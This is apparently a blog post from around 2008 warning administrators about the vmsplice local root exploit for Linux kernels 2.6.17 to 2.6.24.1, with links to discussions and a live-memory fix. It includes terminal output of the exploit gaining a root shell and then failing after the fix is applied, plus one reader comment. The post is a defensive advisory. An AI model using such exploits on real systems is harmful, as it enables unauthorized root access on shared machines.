Linux Kernel exploit for 2.6.17 up to 2.6.24.1
Today I encountered some serious exploits floating around in Full disclosure, Bugtraq and even Slashdot.
Better monkey patch your multiuser machines fast, before the script kiddies get a grip on this...
Beware of the live memory fix as some people experienced memory faults and system breakdowns.
Update:
For more indepth analysis of what has been going on why, what, etc. find a nice LWN article here.
Better monkey patch your multiuser machines fast, before the script kiddies get a grip on this...
- LKML about this issue
- Slashdot Article
- Debian Bugtrack about this exploit
- Live Memory fix, which inserts a ret at the beginning of vmsplice()
- Full exploit POC
[0:07][br@gemini:programming/linux/exploits]% ./exploit ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7f9e000 .. 0xb7fd0000 [+] root bash: 0STY: command not found root@gemini:~/programming/linux/exploits# whoami root root@gemini:~/programming/linux/exploits#
Beware of the live memory fix as some people experienced memory faults and system breakdowns.
[0:13][br@gemini:programming/linux/exploits]% ./disable_exploit ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7fa8000 .. 0xb7fda000 [+] root Exploit gone! [0:14][br@gemini:programming/linux/exploits]% ./exploit ----------------------------------- Linux vmsplice Local Root Exploit By qaaz ----------------------------------- [+] mmap: 0x0 .. 0x1000 [+] page: 0x0 [+] page: 0x20 [+] mmap: 0x4000 .. 0x5000 [+] page: 0x4000 [+] page: 0x4020 [+] mmap: 0x1000 .. 0x2000 [+] page: 0x1000 [+] mmap: 0xb7f7c000 .. 0xb7fae000 [-] vmsplice [0:14][br@gemini:programming/linux/exploits]% whoami br
Update:
For more indepth analysis of what has been going on why, what, etc. find a nice LWN article here.
1 comment
Comments
-
Hey there, yeah, this exploit is another one being out in the wild for linux... especially for those people with many users (i. e. Universities) will have a lot of _fun_ with that bug, as an arbitrary student could get root using that thing. There've been some local user privileges out there, but this one seems rather heavy (as for the account of vmsplice *brr*)... can't wait for that thing to be fixed.